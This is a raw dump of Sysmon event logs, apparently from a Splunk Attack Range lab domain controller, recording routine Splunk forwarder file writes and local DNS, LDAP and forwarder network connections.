AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=872E6832A0E78AE2624EFA64C56DF9E2,SHA256=EDE9937C5A9274CC05CD1450501B6C221E7B273F687E41C796B1C31856082605,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204550Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:29.821{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89978DB6082513EED73676FAA8585A5D,SHA256=B9E689E73212C60BFFDC87663890E5C6F217576A92E002FF1142B73C8E0990BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204551Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:30.824{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B07E29CBFDBE864E9AF1359A3127BE49,SHA256=53E0C1FF59999902A0A99C1209BB32AC4B5FAD76B2F2677C9447A1648C82BB6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204553Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:31.839{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C68EF8E0AC832E1A3AB4EEF4AC571825,SHA256=605276325B20A401E5DA02C8C361CE8462F10414EACA665284B593405557CE76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204552Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:31.261{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A18FB1B7D148D4CE36AF365F8C7017F,SHA256=2DC22FFA412C835E7570DD0EE5D014206B6C697F513910DEBE8FAC82A1EFB5AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204556Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:32.852{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EE80D60E6C443CB49F79E17D3AAABE4,SHA256=DB67F6F94D82CDE8DE9638BD4373C76171237C604646A141CB3C1491ACF3144D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204555Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:32.727{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E60F5B5AB09484F5ACF5BE252C443818,SHA256=804B5DA01C6D5197907C6D706D1C2BC595ABCCDBCEC66D059307ADCD36D09F8F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204554Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:28.081{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60758-false10.0.1.12-8000- 23542300x80000000000000002204557Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:33.868{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B8FA845D43857773902E3F0AC3D9548,SHA256=7252B4A7E5432D661F314B1136B40D5899E7124DFE93A392903825DF6CF72F67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204558Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:34.902{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFA0D0D1925ECA99B0C50AD869AB3D86,SHA256=2DE956DC2597975F91F1A3AF6BE89C50FCF16A0AF180DD94737826A4787FCB29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204559Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:35.918{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98F2A407834E2EA1CB77578EB0811E42,SHA256=C4AE9F5B28B24A6E968578F5B7A4648F56A8AF85D3ACDE76E8516F3C7645B55C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204561Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:36.933{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EEED881096DCFEFEA17E785CC6792A9,SHA256=360B5A5FF26EBEF7E6E9C8B329F89A2DFE39F614A9597BDEA9A9E2E82063D5F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204560Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:36.261{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=751A4D0746313B3CF08C6F8A5D10BB1C,SHA256=45503303516C4B4195C615CF4FB77A1ED915273804E1D4ADF557FAE97553DDFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204563Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:37.949{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE321D88C6B92C1A8DA17AACC5824A5D,SHA256=319E8E47CDBDB3B203E73548A718454C303F2699C4F1CD79CC1011C909D60DE3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204562Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:33.082{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60759-false10.0.1.12-8000- 23542300x80000000000000002204564Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:38.949{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD005B05A382DE9A4B381A9F67880898,SHA256=3EAD1FD8EFBD804B4A77748BBA4CE1BD6B51842EFF5955D4DEFBD253E0A4759F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204565Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:39.965{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24CCD09BB015F99E61B43D8DFB8FAF2E,SHA256=D755B8BDCE42D860B885279000978D77AEBF2B68CE2C131E7DD445F2671FD3BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204566Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:41.011{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99213A6FE8B86E2866776A7D8F60700A,SHA256=271B5A0F27A6149658E270952904CF8797BDB77BB9D2618EA25E4CCF59988994,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204569Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:42.074{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21D782978AE48A775E4EFC1CE62D7F55,SHA256=6FD0DB367D9A7366240ACFA072DC18D93A654FC483C6FE0EC1F763F439A61773,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204568Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:42.058{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=867ED01A03CBC4D2C8419093A8746847,SHA256=186DBB68C6AC5C331548859463A7F41E398E2E93909E63140A794B7CE93537C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204567Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:42.058{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF7A0AAB680946555C31FAD377C2EE8C,SHA256=EF349D4A329C5DB92618864C074150447FAC7C6D0BDA80FE62BF61E39D83E736,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204572Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:38.895{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60760-false10.0.1.12-8000- 23542300x80000000000000002204571Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:43.449{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=867ED01A03CBC4D2C8419093A8746847,SHA256=186DBB68C6AC5C331548859463A7F41E398E2E93909E63140A794B7CE93537C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204570Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:43.090{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECD9E8E0B6EF6B87339065F701978F10,SHA256=0FBEFDC3A94F9770E90998DA8CC3FB60912451299F546FDA3B6EB5DD083C7A23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204573Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:44.090{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0361EB87772864419E378003EC68793,SHA256=B4022450C8CC567666384EB874DDF3A5E76E3DA40100BBBB4BAE1FE466FE3C3A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204576Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:42.004{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local64548- 23542300x80000000000000002204575Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:45.386{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EBFC28678F38D611055D05C0399F66F1,SHA256=5AE9E092E1B3CFB54193AE1D9F845CDABA0379027ACE0035B5544376444D8DA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204574Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:45.121{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFA2F7D0C89AC94313018CD6EE62B69E,SHA256=B6DB2CE5201B60F0E6D02D49ADD791A2AABCD2D0C5ACB9E72D47EB6CF5EC09B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204578Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:43.003{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-64548- 23542300x80000000000000002204577Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:46.136{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=884050460D873B0E0D30AAD7965DC3B8,SHA256=62A1C50850C026E69DC05D4160A123A4A18D7EE7C40CAE6C0292E2B2D5019EE7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204581Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:43.973{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60762-false10.0.1.12-8000- 23542300x80000000000000002204580Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:47.199{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B9D8600895C48695A5DC7FEFBBE212C,SHA256=B8FC5858E1AD4615847BB59C2F320268302DA8AEE770DA728786C32AB21A1D49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204579Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:47.199{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4BBE799ABF2ADAF612FBDA901093FA2,SHA256=1F4F2408682B231585F869B9E91E19E54E977D74237B2A1EB856D7092A607477,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204582Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:48.230{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57C8621689B390373840302663E02D43,SHA256=9D7BC55838D31134ACAC664993225FFDE0957A72D0ACAD760940AA62A454C4F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204584Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:49.230{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB855D09B318D6693599BDCB4019698D,SHA256=A63F7B197FF6DC692202DF7673EFD544F637455CD93E6A9599BCB20800C96A48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204583Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:49.215{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE857D20D8A6C028F5C92AA15DF2AC04,SHA256=2E44B18C0DDD1387A1774250F66312CE5B7239422F955CE390CA32280F5844B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204585Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:50.261{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19204A5F8B581DD8CFF7CC691F9EA5CA,SHA256=E4C78C28DFEFD923EF5D5099C14239559755045EC10725EAFDA086C85FF1AA08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204586Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:51.277{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23B4A364211D165CE7314A9EA02C9DDB,SHA256=9C9D6A1BB51B94A42109C61B26F150F84D85B9577D75AC6BF409E7DC8BEECE6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204588Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:52.308{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5E3082FE8E45CF288214AB1A6FE4148,SHA256=61CA5F4FBC67AB1E770F65782ABAF5CA4CDA1FCF6C64A22E3567B38FFF4A7CE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204587Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:52.215{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CBD7C7868027841F89792FF056CC1713,SHA256=068C8B2FB37C13F242666D0C44A59432F8FC1E714FF36D1DE895AB99FA634808,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204591Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:49.035{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60763-false10.0.1.12-8000- 23542300x80000000000000002204590Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:53.355{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F33D1873088B12290FD1683B38B4E447,SHA256=FBC38AD49BE78645E971C903F44CF451D97A5CDCCAEFCE41801F135F65D034CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204589Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:53.230{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DB8B6C14DCA8ED50E76A72F4E4B3EC79,SHA256=5BC6D2990E4B5A4F7C74D270646068C22E3693A38D6C6538E6C7344536861580,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204592Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:54.371{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A902DD3A19F090DCCC6989AC26B8DF9,SHA256=25FED4F92B6B396B0D679725CC92B4598EA752E737186C70F3CB5C7D044E9E73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204593Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:55.386{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56EF54D762A0249402BFC684D95583B7,SHA256=88BD0B2BCF11C45B5A562A899F8006199A0AA897E621E02A2BB6D3369F6ED90A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204594Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:56.402{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6335F9EB55826B2F5899BBDF51D59694,SHA256=33EDF8F57B993981411C2F75CED41E187135C6A22C29C0A14CAE7C41BAAD1EE9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204598Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:53.942{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60764-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002204597Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:53.942{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60764-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 23542300x80000000000000002204596Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:57.418{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C53909743FB2F294C54EEA2904AD29A8,SHA256=F6D77F454F253005758A51D5818D0EAE9D117D7E25E8D59E50326957126B5194,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204595Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:57.121{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9F7F060F0E61B5E7D52436F44483020A,SHA256=767FBCF4373C712EF0BF19C0C2EC3D265B7B0BB4E3AB4FD5970CAF846DA9BAB8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204600Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:54.051{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60765-false10.0.1.12-8000- 23542300x80000000000000002204599Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:58.449{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20CEE36074042AB5041B165057552E68,SHA256=AF329F7ACD0F3D84B0A02575BAE6EE5A4EFB2A68D89F8A1151B7A83FAB42BC02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204601Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:59.511{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4D40D6DE0783D573C2CC59377CF7484,SHA256=F61EB6D6ADF79302DC0E911EF782B907DBFD19FD04203F6215818E9BEE9A87AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204602Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:00.527{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 